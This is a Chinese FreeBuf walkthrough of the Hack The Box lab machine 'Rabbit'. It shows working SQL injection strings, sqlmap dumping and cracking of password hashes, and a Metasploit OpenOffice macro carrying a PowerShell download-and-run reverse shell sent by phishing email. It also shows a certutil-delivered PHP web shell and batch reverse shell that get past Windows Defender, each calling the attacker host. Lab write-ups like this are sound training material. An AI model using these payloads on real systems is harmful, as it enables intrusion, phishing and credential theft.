freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

HTB靶机渗透系列之Rabbit
2022-04-21 16:59:11

Rabbit是一个非常困难的靶机,知识点涉及垂直越权、SQL注入、邮件钓鱼、服务提权、Windows Defender绕过等。感兴趣的同学可以在HackTheBox中进行学习。

截屏2021-10-28 下午3.46.44
通关思维导图
Rabbit

0x01 侦查

端口探测

首先通过nmap对目标进行端口扫描

nmap -Pn -p- -sV -sC -A 10.10.10.71 -oA nmap_Rabbit

截屏2021-10-29 上午11.31.49
截屏2021-10-29 上午11.32.05
截屏2021-10-29 上午11.32.20
扫描结果显示目标开放了80、88、135、443、445等端口,不愧是”狡兔三窟“

80端口

访问后站点显示403
截屏2021-10-29 下午1.07.12

443端口

访问后发现这是 IIS 7 的默认界面
截屏2021-10-29 下午1.08.15

使用 gobuster 对站点进行目录扫描

gobuster dir -u https://10.10.10.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

注意:需要添加-k参数英语跳过证书认证,否则会出现无效证书的报错信息
截屏2021-10-29 下午1.55.33

正常情况访问到的目录都指向https://10.10.10.71/owa
截屏2021-10-29 下午4.57.17

访问该目录发现这是 outlook 邮件登陆界面

Outlook是由微软公司所出品Office内的个人信息管理系统软件,功能包括收发电子邮件、查看日历等

截屏2021-10-29 下午4.57.44

8080端口

访问后发现这是一个演示界面
截屏2021-10-29 下午1.07.51

使用 gobuster 对站点进行目录扫描

gobuster dir -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

截屏2021-10-29 下午1.51.36

结果存在两个301跳转,分别访问对应目录/joomla/complain

/joomla目录中未发现可利用点
截屏2021-10-29 下午1.56.50

/comlain目录则是一个名为 Complain Management System 的应用,默认账号密码为admin/admin123,但无法登录
截屏2021-10-29 下午1.56.58

垂直越权漏洞

尝试在注册页面/complain/register.php中注册账户,设置账号密码为admin/admin123,用户类型为 Customer,注册完成后进入用户界面
截屏2021-10-29 下午3.48.46

点击View Complain Details发现其参数对应的是mod=customer&view=compDetails
截屏2021-10-29 下午3.54.13

在请求中将参数mod修改为 admin 后可以发能够看到投诉详情,说明存在垂直越权漏洞
截屏2021-10-29 下午4.01.33

SQL注入漏洞

在 exploit-db 中我们发现 Complain Management System 除了越权以外还存在SQL注入,漏洞路径为/complain/view.php?mod=admin&view=repod&id=plans,开始尝试进行手工注入
参考文章1:https://www.exploit-db.com/exploits/42968
参考文章2:https://www.exploit-db.com/exploits/41131

首先获取数据库的基本信息,发现当前数据库版本为 5.7.19,当前用户为 Dbuser@localhost

id=engineer union all select 1,version(),3,user(),5,database(),7--

截屏2021-10-29 下午4.15.24

查看所有数据库名,其中包含secretJoomla

id=engineer union all select 1,schema_name,3,4,5,6,7 from information_schema.schemata--

截屏2021-10-29 下午4.19.38

查看secret数据库中的所有表,其中包含users
注意:需要将库名修改为hex编码

id=engineer union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=0x736563726574--

截屏2021-10-29 下午4.22.18

查看users表中所有列名,其中包含usernamepassword

id=engineer union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=0x7573657273--

截屏2021-10-29 下午4.51.18

尝试获取users表中列名usernamepassword当中的数据

id=engineer union all select 1,username,password,4,5,6,7 from secret.users--

截屏2021-10-29 下午4.53.38

成功获取账号密码如下:

Kain 	       33903fbcc0b1046a09edfaa0a65e8f8c
 Raziel 	   719da165a626b4cf23b626896c213b84
 Ariel 	       B9c2538d92362e0e18e52d0ee9ca0c6f
 Dimitri 	   D459f76a5eeeed0eca8ab4476c144ac4
 Magnus 	   370fc3559c9f0bff80543f2e1151c537
 Zephon 	   13fa8abd10eed98d89fd6fc678afaf94
 Turel 	       D322dc36451587ea2994c84c9d9717a1
 Dumah 	       33da7a40473c1637f1a2e142f4925194
 Malek 	       Dea56e47f1c62c30b83b70eb281a6c39
 Moebius 	   A6f30815a43f38ec6de95b9a9d74da37

当然我们也可以直接利用 sqlmap 来获取对应信息

sqlmap -u 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans' --cookie='PHPSESSID= ' -D secret -T users --dump

注意:需要在其中填入 Cookie 信息

在破解网站对获取到的密文进行破解
破解网站:https://crackstation.net/
截屏2021-10-29 下午5.44.17
解密结果如下:

33903fbcc0b1046a09edfaa0a65e8f8c	md5	doradaybendita
719da165a626b4cf23b626896c213b84	md5	kelseylovesbarry
B9c2538d92362e0e18e52d0ee9ca0c6f	md5	pussycatdolls
D459f76a5eeeed0eca8ab4476c144ac4	md5	shaunamaloney
370fc3559c9f0bff80543f2e1151c537	md5	xNnWo6272k7x
13fa8abd10eed98d89fd6fc678afaf94	Unknown	Not found.
D322dc36451587ea2994c84c9d9717a1	Unknown	Not found.
33da7a40473c1637f1a2e142f4925194	md5	popcorn
Dea56e47f1c62c30b83b70eb281a6c39	md5	barcelona
A6f30815a43f38ec6de95b9a9d74da37	md5	santiago

0x02 上线[raziel]

OWA邮件系统

使用破解后的账号密码Kain/doradaybendita登录OWA
截屏2021-11-01 下午9.33.23

查看邮箱中的邮件以获取关键信息
截屏2021-11-01 下午9.33.31

在其中我们获取到如下信息:

1.Open Office 已部署
2.Windows Defender 已开启
3.PowerShell 已限制

制作木马

使用 MSF 针对 Open Office 生成反弹shell文档msf.odt

msfconsole
msf > use exploit/multi/misc/openoffice_document_macro
msf > set srvhost 10.10.14.17
msf > set lhost 10.10.14.17
msf > run

截屏2021-11-01 下午9.52.10

将文档后缀名修改为.zip并将其解压

mv msf.odt msf.zip

解压后在其中找到Basic/Standard/目录,编辑文件Module1.xml并修改payload如下

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 1234 -e cmd

根据提示信息可知目前 powershell 已被限制,尝试将其版本修改为2来绕过限制

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 1234 -e cmd;

截屏2021-11-02 上午3.05.08

接下来将powercat.ps1复制到本目录下并开启 http 服务

cp /root/hackthebox/Machines/Jeeves/powercat.ps1 .
python -m SimpleHTTPServer 80

截屏2021-11-01 下午10.11.43

在本地监听1234端口

nc -nvlp 1234

截屏2021-11-01 下午10.11.55

钓鱼邮件

在尝试发送邮件时又遇到一个小问题:选择邮件发送但是无法上传文件。通过不断尝试后我们发现了解决方法,只需要在登录界面选择轻量版登录即可
截屏2021-11-01 下午11.39.29

将用户切换为 Ariel 后上传文件并向每个联系人发送邮件
截屏2021-11-02 上午12.20.51

经过漫长的等待之后成功拿到反弹shell,但这个shell每隔一段时间就会自动断开
截屏2021-11-02 上午9.50.18

在当前用户桌面上寻找flag,成功拿到第一个flag

dir C:\Users\Raziel\Desktop
type C:\Users\Raziel\Desktop\user.txt

截屏2021-11-02 上午10.26.00

0x03 权限提升[system]

信息收集

查看系统信息,发现操作系统版本为 Windows Server 2008 R2

systeminfo

截屏2021-11-02 上午9.59.19

系统中安装多个补丁,经检测后发现无法使用内核提权
截屏2021-11-02 上午9.59.52

在进程中未发现可用信息

tasklist /v

截屏2021-11-02 上午10.28.35

在服务中发现 Apache 和 Mysql 服务,它们的运行权限都为系统权限,因此我们可以从这些服务入手完成提权

wmic service where started=true get name,startname

截屏2021-11-02 上午10.29.45

Windows Defender限制

检查当前用户对wamp根目录拥有何种权限,结果显示具有写入权限

cacls C:\wamp64

截屏2021-11-02 上午11.04.33

既然如此我们可进入 web 目录并插入木马,但是木马cmd.php一经写入直接被 Windows Defender 杀掉

echo '<?php echo system($_GET["cmd"]);?>' > cmd.php
certutil -urlcache -split -f http://10.10.14.17/cmd.php c:\wamp64\www\cmd.php

截屏2021-11-02 上午11.05.36

尝试上传 nc.exe,但没过一会 nc.exe 也被杀掉了

certutil  -f -split -urlcache  http://10.10.14.17/nc.exe C:\Temp\nc.exe

截屏2021-11-02 上午11.41.06
那么我们还是尝试使用之前的 powershell v2 来绕过 Windows Defender

Windows Defender绕过

创建cmd.bat文件用于设置反弹shell

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 2345 -e cmd;

创建cmd.php文件用于执行bat文件

<?php echo exec("C:\wamp64\www\cmd.bat");?>

使用 certutil 上传cmd.batcmd.php

certutil -urlcache -split -f http://10.10.14.17/cmd.php c:\wamp64\www\cmd.php
certutil -urlcache -split -f http://10.10.14.17/cmd.bat c:\wamp64\www\cmd.bat

在本地监听2345端口

nc -nvlp 2345

访问木马地址/cmd.php可成功获得目标shell

curl http://10.10.10.71:8080/cmd.php

截屏2021-11-02 下午12.51.25
在管理员桌面上寻找flag

dir c:\Users\Administrator\Desktop
type c:\Users\Administrator\Desktop\root.txt

截屏2021-11-02 下午12.53.14
成功获取第二个flag

总结:由于该靶机存在N多个端口,因此我们初期的工作就是寻找弱点。最终在位于8080端口的站点中找到了应用Complain Management System,通过搜索该应用系统的Nday漏洞,其中存在的SQL注入帮助我们获取到了需要的账号密码,利用其中的账号密码登陆OWA并发送带有恶意odt的钓鱼邮件,受害者打开后会执行反弹shell,从而成功获取用户权限。在靶机中存在杀软Windows Defender,我们可利用Powershell v2编写bat脚本用于绕过杀软,当然令人震惊的还是Apache服务的运行权限居然是系统权限,我们可将木马上传至web站点,使用PHP执行bat脚本。这样就成功借助Apache服务提权至系统权限

本文作者:, 转载请注明来自FreeBuf.COM

# HTB渗透
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑